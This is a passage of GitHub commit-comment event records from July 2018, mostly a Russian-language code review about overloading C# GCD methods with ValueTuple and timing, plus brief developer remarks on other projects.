Anzhelika Kravchuk < \n\n\nnotifications@github.com> написал: \n\n\n\n\n> Вот эти методы EuclideanGCD(int firstNumber, int secondNumber, params \n\n\n> int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber, params \n\n\n> int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг! \n\n\n> я не могу ничем оправдать этот int firstNumber, int secondNumber, params \n\n\n> int[] numbers список параметров. \n\n\n> \n\n\n> > On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote: \n\n\n> > \n\n\n> > Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int \n\n\n> secondNumber) \n\n\n> > + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time) + \n\n\n> > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers) + \n\n\n> > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers , \n\n\n> out \n\n\n> > TimeSpan time ) ? \n\n\n> > \n\n\n> > \n\n\n> > 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk < \n\n\n> > notifications@github.com> написал: \n\n\n> > \n\n\n> > > Идея была хорошая, реализация не годиться. Что я хотела бы увидеть, \n\n\n> как \n\n\n> > > доступную публичную функциональность класса - это 3 (или 6 все зависит \n\n\n> от \n\n\n> > > варианта возвращения времени счета) перегруженных версии для 1-го \n\n\n> алгоритма \n\n\n> > > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего кроме \n\n\n> > > числовых значений. А вот все остальное в плане избавления от копи \n\n\n> паста - \n\n\n> > > на ваше усмотрение). Пользователь вашего кода должен знать только то, \n\n\n> что \n\n\n> > > он использует именно указанную модификацию для указанного количества \n\n\n> > > числел, и опционально решать - нужно или нет ему время. \n\n\n> > > \n\n\n> > > — \n\n\n> > > You are receiving this because you authored the thread. \n\n\n> > > Reply to this email directly, view it on GitHub \n\n\n> > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/ \n\n\n> 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>, \n\n\n> > > or mute the thread \n\n\n> > > <https://github.com/notifications/unsubscribe- \n\n\n> auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f> \n\n\n> > > . \n\n\n> > > \n\n\n> > — \n\n\n> > You are receiving this because you commented. \n\n\n> > Reply to this email directly, view it on GitHub <https://github.com/ \n\n\n> Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9 \n\n\n> a1016daa30#commitcomment-29579922>, or mute the thread < \n\n\n> https://github.com/notifications/unsubscribe-auth/ \n\n\n> AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>. \n\n\n> \n\n\n> > \n\n\n> \n\n\n> — \n\n\n> You are receiving this because you authored the thread. \n\n\n> Reply to this email directly, view it on GitHub \n\n\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579954>, \n\n\n> or mute the thread \n\n\n> <https://github.com/notifications/unsubscribe-auth/AeM1XkXiSLJkcVHW8q8lok4iYPhf0PhJks5uC2SrgaJpZM4VAt6f> \n\n\n> . \n\n\n> \n\n\n\n\n—\n\n\nYou are receiving this because you commented.\n\n\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n\n\n\n\n\n\n"}},"created_at":"2018-07-04T17:01:00Z"}
{"id":"7919472306","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29597993,"position":null,"line":null,"path":null,"commit_id":"c01e9428cd7eee6ab3aae599e75750362f581992","created_at":"2018-07-04T17:01:45Z","updated_at":"2018-07-04T17:01:45Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Projet výjimky v adminu](https://trello.com/c/PDpj150K/636-2-projet-v%C3%BDjimky-v-adminu)"}},"created_at":"2018-07-04T17:01:45Z"}
{"id":"7919472336","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597994,"position":116,"line":217,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:01:46Z","updated_at":"2018-07-04T17:01:46Z","author_association":"COLLABORATOR","body":"could be. `Number` in JS doesn't distinguish between decimals and integers."}},"created_at":"2018-07-04T17:01:46Z"}
{"id":"7919473690","type":"CommitCommentEvent","actor":{"login":"yudiagussetiawan"},"repo":{"name":"nebulasio/web-wallet"},"payload":{"comment":{"id":29598001,"position":16,"line":29,"path":"lib/nebulas.js","commit_id":"fba4186af119b378d2341059ee4aa57d1bf0257f","created_at":"2018-07-04T17:02:13Z","updated_at":"2018-07-04T17:02:13Z","author_association":"NONE","body":"make nebulas @wallet"}},"created_at":"2018-07-04T17:02:13Z"}
{"id":"7919475537","type":"CommitCommentEvent","actor":{"login":"gosalelab"},"repo":{"name":"spring-projects/spring-social"},"payload":{"comment":{"id":29598003,"position":null,"line":null,"path":null,"commit_id":"79341986fec8b663f5a3c059e61823c24765d9ec","created_at":"2018-07-04T17:02:40Z","updated_at":"2018-07-04T17:02:40Z","author_association":"NONE","body":"How can I use this 'M' version, tks!"}},"created_at":"2018-07-04T17:02:40Z"}
{"id":"7919478008","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598011,"position":129,"line":230,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:03:30Z","updated_at":"2018-07-04T17:03:30Z","author_association":"COLLABORATOR","body":"I'll add the extra check .. the variable names is something for the nice to have"}},"created_at":"2018-07-04T17:03:30Z"}
{"id":"7919479426","type":"CommitCommentEvent","actor":{"login":"Ronimeister"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29598017,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-04T17:04:01Z","updated_at":"2018-07-04T17:04:01Z","author_association":"OWNER","body":"Т.е., в тестах будет примерно такой метод?\r\npublic int EuclideanGCD_IsCorrect(int firstNumber, int secondNumber, int\r\nthirdNumber)\r\n        {\r\n            (int result, _) = GCDFinder.EuclideanGCD(firstNumber,\r\nsecondNumber, thirdNumber);\r\n            return result;\r\n        }\r\n\r\n\r\n\r\n\r\nBest regards, Alexey Kanunnikov.\r\n\r\n4 июля 2018 г., 20:01 пользователь Anzhelika Kravchuk <\r\nnotifications@github.com> написал:\r\n\r\n> Добрый вечер.\r\n>\r\n>\r\n>\r\n>\r\n> Я бы сказала, учитывая наличие valuetuple, что будут только перегруженные\r\n> версии методов возвращающие пару - значение и время.\r\n>\r\n>\r\n>\r\n>\r\n> ________________________________\r\n>\r\n>\r\n> Best regards, Anzhelika Kravchuk.\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n> От: Alexey Kanunnikov\r\n>\r\n>\r\n> Отправлено: среда, 4 июля, 19:44\r\n>\r\n>\r\n> Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added.\r\n> (4ff5866)\r\n>\r\n>\r\n> Кому: Ronimeister/NET.S.2018.Kanunnikov.03\r\n>\r\n>\r\n> Копия: Anzhelika Kravchuk, Comment\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n> Здравствуйте, есть вопрос по поводу задания на НОД: все перегруженные\r\n>\r\n>\r\n> методы(если я использую ValueTuple) должны возвращать время? Ну, т.е., во\r\n>\r\n>\r\n> всех ли публичных методах мне реализовывать подсчёт времени или дб. как\r\n>\r\n>\r\n> методы с временем, так и без него?\r\n>\r\n>\r\n>\r\n>\r\n> 3 июля 2018 г., 15:33 пользователь Anzhelika Kravchuk <\r\n>\r\n>\r\n> notifications@github.com> написал:\r\n>\r\n>\r\n>\r\n>\r\n> > Вот эти методы EuclideanGCD(int firstNumber, int secondNumber, params\r\n>\r\n>\r\n> > int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber, params\r\n>\r\n>\r\n> > int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг!\r\n>\r\n>\r\n> > я не могу ничем оправдать этот int firstNumber, int secondNumber, params\r\n>\r\n>\r\n> > int[] numbers список параметров.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > > On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote:\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> > > Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int\r\n>\r\n>\r\n> > secondNumber)\r\n>\r\n>\r\n> > > + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time) +\r\n>\r\n>\r\n> > > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers)\r\n> +\r\n>\r\n>\r\n> > > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers ,\r\n>\r\n>\r\n> > out\r\n>\r\n>\r\n> > > TimeSpan time ) ?\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> > > 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk <\r\n>\r\n>\r\n> > > notifications@github.com> написал:\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> > > > Идея была хорошая, реализация не годиться. Что я хотела бы увидеть,\r\n>\r\n>\r\n> > как\r\n>\r\n>\r\n> > > > доступную публичную функциональность класса - это 3 (или 6 все\r\n> зависит\r\n>\r\n>\r\n> > от\r\n>\r\n>\r\n> > > > варианта возвращения времени счета) перегруженных версии для 1-го\r\n>\r\n>\r\n> > алгоритма\r\n>\r\n>\r\n> > > > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего кроме\r\n>\r\n>\r\n> > > > числовых значений. А вот все остальное в плане избавления от копи\r\n>\r\n>\r\n> > паста -\r\n>\r\n>\r\n> > > > на ваше усмотрение). Пользователь вашего кода должен знать только\r\n> то,\r\n>\r\n>\r\n> > что\r\n>\r\n>\r\n> > > > он использует именно указанную модификацию для указанного количества\r\n>\r\n>\r\n> > > > числел, и опционально решать - нужно или нет ему время.\r\n>\r\n>\r\n> > > >\r\n>\r\n>\r\n> > > > —\r\n>\r\n>\r\n> > > > You are receiving this because you authored the thread.\r\n>\r\n>\r\n> > > > Reply to this email directly, view it on GitHub\r\n>\r\n>\r\n> > > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\r\n>\r\n>\r\n> > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>,\r\n>\r\n>\r\n> > > > or mute the thread\r\n>\r\n>\r\n> > > > <https://github.com/notifications/unsubscribe-\r\n>\r\n>\r\n> > auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f>\r\n>\r\n>\r\n> > > > .\r\n>\r\n>\r\n> > > >\r\n>\r\n>\r\n> > > —\r\n>\r\n>\r\n> > > You are receiving this because you commented.\r\n>\r\n>\r\n> > > Reply to this email directly, view it on GitHub <https://github.com/\r\n>\r\n>\r\n> > Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9\r\n>\r\n>\r\n>\r\n> > a1016daa30#commitcomment-29579922>, or mute the thread <\r\n>\r\n>\r\n> > https://github.com/notifications/unsubscribe-auth/\r\n>\r\n>\r\n> > AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>.\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > >\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n> > —\r\n>\r\n>\r\n> > You are receiving this because you authored the thread.\r\n>\r\n>\r\n> > Reply to this email directly, view it on GitHub\r\n>\r\n>\r\n> > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\r\n> 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579954>,\r\n>\r\n>\r\n> > or mute the thread\r\n>\r\n>\r\n> > <https://github.com/notifications/unsubscribe-auth/\r\n> AeM1XkXiSLJkcVHW8q8lok4iYPhf0PhJks5uC2SrgaJpZM4VAt6f>\r\n>\r\n>\r\n> > .\r\n>\r\n>\r\n> >\r\n>\r\n>\r\n>\r\n>\r\n> —\r\n>\r\n>\r\n> You are receiving this because you commented.\r\n>\r\n>\r\n> Reply to this email directly, view it on GitHub, or mute the thread.\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29597986>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AeM1XnSmSfCKvNkXGCiQ3UR4Q-t8lfL-ks5uDPTNgaJpZM4VAt6f>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-04T17:04:01Z"}
{"id":"7919481349","type":"CommitCommentEvent","actor":{"login":"jullyanehawkins"},"repo":{"name":"deepdivedylan/ngrx-comments"},"payload":{"comment":{"id":29598020,"position":null,"line":null,"path":null,"commit_id":"1bd46231c0e7b7b7a30617f80a7eb1d97c98a8de","created_at":"2018-07-04T17:04:40Z","updated_at":"2018-07-04T17:04:40Z","author_association":"NONE","body":"👹"}},"created_at":"2018-07-04T17:04:40Z"}
{"id":"7919484271","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598026,"position":116,"line":217,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:05:40Z","updated_at":"2018-07-04T17:05:40Z","author_association":"OWNER","body":"Yes, but I mean from GD perspective. We can't subtract 0.5 diamonds or coins, so what happens when this number is not an integer?"}},"created_at":"2018-07-04T17:05:40Z"}
{"id":"7919485348","type":"CommitCommentEvent","actor":{"login":"agathver"},"repo":{"name":"kelektiv/node.bcrypt.js"},"payload":{"comment":{"id":29598028,"position":null,"line":null,"path":null,"commit_id":"a78d381b748b49ded79957a35c9d56be42f0fa57","created_at":"2018-07-04T17:06:04Z","updated_at":"2018-07-04T17:06:04Z","author_association":"COLLABORATOR","body":"Because it has borken in the past. `node-pre-gyp` _does not follow semver_. 0.6 to 0.7 changed the files uploaded with the pre-built tarball. 0.8 - 0.10 dropped the support for NodeJS versions. "}},"created_at":"2018-07-04T17:06:04Z"}
{"id":"7919486146","type":"CommitCommentEvent","actor":{"login":"agriffard"},"repo":{"name":"OrchardCMS/OrchardCore"},"payload":{"comment":{"id":29598031,"position":4,"line":18,"path":"src/OrchardCore/OrchardCore.Modules/OrchardCore.Modules.csproj","commit_id":"4688108f1140cbbda7f8b86f0f3ce866289bb333","created_at":"2018-07-04T17:06:21Z","updated_at":"2018-07-04T17:06:21Z","author_association":"MEMBER","body":"Do not use version. It is already in Dependencies.AspNetCore.props."}},"created_at":"2018-07-04T17:06:21Z"}
{"id":"7919487703","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29598037,"position":null,"line":null,"path":null,"commit_id":"917a52afe3ed70edf429001d42f7d856242e883d","created_at":"2018-07-04T17:06:54Z","updated_at":"2018-07-04T17:06:54Z","author_association":"CONTRIBUTOR","body":"But is this already in the release? Maybe wait until it is actually released?\r\nAlso, would you please take [this](https://github.com/perl6/doc/blob/master/CONTRIBUTING.md#documenting-versions) into account if applicable?\r\nIf it's not a new feature, but just putting into test existing behavior, just disregard this comment."}},"created_at":"2018-07-04T17:06:54Z"}
{"id":"7919491362","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598040,"position":148,"line":249,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:08:09Z","updated_at":"2018-07-04T17:08:09Z","author_association":"COLLABORATOR","body":"yes, but we can't. The engine (for now) only allows for a single, flat, `string, string` key/value pairs. That's why I \"solved\" it using price0/1 and currency0/1. \r\nA solution would be instead of price0/currency0 using value of currency0 as key and the value of price0 as value. But then we have dynamic key/value pairs which would make the life of our designers and BI team more difficult to analyse the data."}},"created_at":"2018-07-04T17:08:09Z"}
{"id":"7919492668","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598042,"position":159,"line":260,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:08:34Z","updated_at":"2018-07-04T17:08:34Z","author_association":"COLLABORATOR","body":"I was thinking the same! Can you chase this next week?"}},"created_at":"2018-07-04T17:08:34Z"}
{"id":"7919494640","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598046,"position":169,"line":270,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:09:17Z","updated_at":"2018-07-04T17:09:17Z","author_association":"COLLABORATOR","body":"I can, but I also like sugar in my syntax 😂 "}},"created_at":"2018-07-04T17:09:17Z"}
{"id":"7919494671","type":"CommitCommentEvent","actor":{"login":"AnnoyingTechnology"},"repo":{"name":"polyfony-inc/polyfony"},"payload":{"comment":{"id":29598047,"position":null,"line":null,"path":null,"commit_id":"ea4613766cf917494be4ea0d6bb0c7300caa52e3","created_at":"2018-07-04T17:09:18Z","updated_at":"2018-07-04T17:09:18Z","author_association":"CONTRIBUTOR","body":"The 2.3 version/branch introduces the XSS escaping as default behavior. This is a backward breaking change."}},"created_at":"2018-07-04T17:09:18Z"}
{"id":"7919494722","type":"CommitCommentEvent","actor":{"login":"philtrade"},"repo":{"name":"qqwweee/keras-yolo3"},"payload":{"comment":{"id":29598048,"position":5,"line":20,"path":"yolo.py","commit_id":"da7d756b0e47b979e701f0131ba7074ea138add8","created_at":"2018-07-04T17:09:19Z","updated_at":"2018-07-04T17:09:19Z","author_association":"NONE","body":"See pull request #146 , which adds command-line parsing to yolo.py for weights file, anchors, classes, and gpu_num.   "}},"created_at":"2018-07-04T17:09:19Z"}
{"id":"7919496438","type":"CommitCommentEvent","actor":{"login":"nalimilan"},"repo":{"name":"dmbates/MixedModels.jl"},"payload":{"comment":{"id":29598053,"position":5,"line":227,"path":"src/modelterms.jl","commit_id":"4914d62012619403382c725cbe6b7edbe62cd9c3","created_at":"2018-07-04T17:09:56Z","updated_at":"2018-07-04T17:09:56Z","author_association":"COLLABORATOR","body":"It's good to fix the bug that way, but in the long term it would probably be nicer to avoid exposing `index` to the user. Instead, the code which accesses `A.f.refs[i]` could do `CategoricalArrays.order(A.f.pool)[A.f.refs[i]` to get the position in the levels, and use that everywhere."}},"created_at":"2018-07-04T17:09:56Z"}
{"id":"7919498455","type":"CommitCommentEvent","actor":{"login":"mikhoul"},"repo":{"name":"ollimexx/lossless-cut"},"payload":{"comment":{"id":29598058,"position":null,"line":null,"path":null,"commit_id":"02ad4eabc2b57cb0ee6af4528bd6f242152d9549","created_at":"2018-07-04T17:10:34Z","updated_at":"2018-07-04T17:10:34Z","author_association":"NONE","body":"@ollimexx   Issue are not enabled on the repo so this is the only way to contact you I've found.\r\n\r\nCould you build a version for Windows of your fork, I'd really like to use the sequencer to edit quickly my small video.\r\n\r\nRegards :octocat: "}},"created_at":"2018-07-04T17:10:34Z"}
{"id":"7919499951","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598066,"position":211,"line":312,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:11:09Z","updated_at":"2018-07-04T17:11:09Z","author_association":"COLLABORATOR","body":"ahhh .. you're right!"}},"created_at":"2018-07-04T17:11:09Z"}
{"id":"7919502249","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29598074,"position":185,"line":286,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T17:12:00Z","updated_at":"2018-07-04T17:12:00Z","author_association":"COLLABORATOR","body":"I have to think, because that means adding an extra track event"}},"created_at":"2018-07-04T17:12:00Z"}
{"id":"7919503531","type":"CommitCommentEvent","actor":{"login":"sophianbj"},"repo":{"name":"sophianbj/mytest18"},"payload":{"comment":{"id":29598078,"position":null,"line":null,"path":null,"commit_id":"6a7ff30fcbf372073614d37a1a5f71f092615a9c","created_at":"2018-07-04T17:12:27Z","updated_at":"2018-07-04T17:12:27Z","author_association":"OWNER","body":"通过art-template.js模板和jquery。"}},"created_at":"2018-07-04T17:12:27Z"}
{"id":"7919504853","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29598083,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-04T17:12:56Z","updated_at":"2018-07-04T17:12:56Z","author_association":"NONE","body":"Да, может быть и такой. Можно ещё добавить тесты со временем, выводя время в debug, для того, чтобы, например, сравнить бинарный и классический.\n\n\n\n\n________________________________\n\n\nBest regards, Anzhelika Kravchuk.\n\n\n\n\n\n\n\nОт: Alexey Kanunnikov\n\n\nОтправлено: среда, 4 июля, 20:04\n\n\nТема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added. (4ff5866)\n\n\nКому: Ronimeister/NET.S.2018.Kanunnikov.03\n\n\nКопия: Anzhelika Kravchuk, Comment\n\n\n\n\n\n\nТ.е., в тестах будет примерно такой метод? \n\n\npublic int EuclideanGCD_IsCorrect(int firstNumber, int secondNumber, int \n\n\nthirdNumber) \n\n\n{ \n\n\n(int result, _) = GCDFinder.EuclideanGCD(firstNumber, \n\n\nsecondNumber, thirdNumber); \n\n\nreturn result; \n\n\n} \n\n\n\n\n\n\n\n\n\n\nBest regards, Alexey Kanunnikov. \n\n\n\n\n4 июля 2018 г., 20:01 пользователь Anzhelika Kravchuk < \n\n\nnotifications@github.com> написал: \n\n\n\n\n> Добрый вечер. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> Я бы сказала, учитывая наличие valuetuple, что будут только перегруженные \n\n\n> версии методов возвращающие пару - значение и время. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> ________________________________ \n\n\n> \n\n\n> \n\n\n> Best regards, Anzhelika Kravchuk. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> От: Alexey Kanunnikov \n\n\n> \n\n\n> \n\n\n> Отправлено: среда, 4 июля, 19:44 \n\n\n> \n\n\n> \n\n\n> Тема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added. \n\n\n> (4ff5866) \n\n\n> \n\n\n> \n\n\n> Кому: Ronimeister/NET.S.2018.Kanunnikov.03 \n\n\n> \n\n\n> \n\n\n> Копия: Anzhelika Kravchuk, Comment \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> Здравствуйте, есть вопрос по поводу задания на НОД: все перегруженные \n\n\n> \n\n\n> \n\n\n> методы(если я использую ValueTuple) должны возвращать время? Ну, т.е., во \n\n\n> \n\n\n> \n\n\n> всех ли публичных методах мне реализовывать подсчёт времени или дб. как \n\n\n> \n\n\n> \n\n\n> методы с временем, так и без него? \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> 3 июля 2018 г., 15:33 пользователь Anzhelika Kravchuk < \n\n\n> \n\n\n> \n\n\n> notifications@github.com> написал: \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> > Вот эти методы EuclideanGCD(int firstNumber, int secondNumber, params \n\n\n> \n\n\n> \n\n\n> > int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber, params \n\n\n> \n\n\n> \n\n\n> > int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг! \n\n\n> \n\n\n> \n\n\n> > я не могу ничем оправдать этот int firstNumber, int secondNumber, params \n\n\n> \n\n\n> \n\n\n> > int[] numbers список параметров. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote: \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > > Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int \n\n\n> \n\n\n> \n\n\n> > secondNumber) \n\n\n> \n\n\n> \n\n\n> > > + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time) + \n\n\n> \n\n\n> \n\n\n> > > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers) \n\n\n> + \n\n\n> \n\n\n> \n\n\n> > > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers , \n\n\n> \n\n\n> \n\n\n> > out \n\n\n> \n\n\n> \n\n\n> > > TimeSpan time ) ? \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > > 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk < \n\n\n> \n\n\n> \n\n\n> > > notifications@github.com> написал: \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > > > Идея была хорошая, реализация не годиться. Что я хотела бы увидеть, \n\n\n> \n\n\n> \n\n\n> > как \n\n\n> \n\n\n> \n\n\n> > > > доступную публичную функциональность класса - это 3 (или 6 все \n\n\n> зависит \n\n\n> \n\n\n> \n\n\n> > от \n\n\n> \n\n\n> \n\n\n> > > > варианта возвращения времени счета) перегруженных версии для 1-го \n\n\n> \n\n\n> \n\n\n> > алгоритма \n\n\n> \n\n\n> \n\n\n> > > > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего кроме \n\n\n> \n\n\n> \n\n\n> > > > числовых значений. А вот все остальное в плане избавления от копи \n\n\n> \n\n\n> \n\n\n> > паста - \n\n\n> \n\n\n> \n\n\n> > > > на ваше усмотрение). Пользователь вашего кода должен знать только \n\n\n> то, \n\n\n> \n\n\n> \n\n\n> > что \n\n\n> \n\n\n> \n\n\n> > > > он использует именно указанную модификацию для указанного количества \n\n\n> \n\n\n> \n\n\n> > > > числел, и опционально решать - нужно или нет ему время. \n\n\n> \n\n\n> \n\n\n> > > > \n\n\n> \n\n\n> \n\n\n> > > > — \n\n\n> \n\n\n> \n\n\n> > > > You are receiving this because you authored the thread. \n\n\n> \n\n\n> \n\n\n> > > > Reply to this email directly, view it on GitHub \n\n\n> \n\n\n> \n\n\n> > > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/ \n\n\n> \n\n\n> \n\n\n> > 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>, \n\n\n> \n\n\n> \n\n\n> > > > or mute the thread \n\n\n> \n\n\n> \n\n\n> > > > <https://github.com/notifications/unsubscribe- \n\n\n> \n\n\n> \n\n\n> > auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f> \n\n\n> \n\n\n> \n\n\n> > > > . \n\n\n> \n\n\n> \n\n\n> > > > \n\n\n> \n\n\n> \n\n\n> > > — \n\n\n> \n\n\n> \n\n\n> > > You are receiving this because you commented. \n\n\n> \n\n\n> \n\n\n> > > Reply to this email directly, view it on GitHub <https://github.com/ \n\n\n> \n\n\n> \n\n\n> > Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9 \n\n\n> \n\n\n> \n\n\n> \n\n\n> > a1016daa30#commitcomment-29579922>, or mute the thread < \n\n\n> \n\n\n> \n\n\n> > https://github.com/notifications/unsubscribe-auth/ \n\n\n> \n\n\n> \n\n\n> > AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>. \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > > \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> > — \n\n\n> \n\n\n> \n\n\n> > You are receiving this because you authored the thread. \n\n\n> \n\n\n> \n\n\n> > Reply to this email directly, view it on GitHub \n\n\n> \n\n\n> \n\n\n> > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/ \n\n\n> 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579954>, \n\n\n> \n\n\n> \n\n\n> > or mute the thread \n\n\n> \n\n\n> \n\n\n> > <https://github.com/notifications/unsubscribe-auth/ \n\n\n> AeM1XkXiSLJkcVHW8q8lok4iYPhf0PhJks5uC2SrgaJpZM4VAt6f> \n\n\n> \n\n\n> \n\n\n> > . \n\n\n> \n\n\n> \n\n\n> > \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> — \n\n\n> \n\n\n> \n\n\n> You are receiving this because you commented. \n\n\n> \n\n\n> \n\n\n> Reply to this email directly, view it on GitHub, or mute the thread. \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> \n\n\n> — \n\n\n> You are receiving this because you authored the thread. \n\n\n> Reply to this email directly, view it on GitHub \n\n\n> 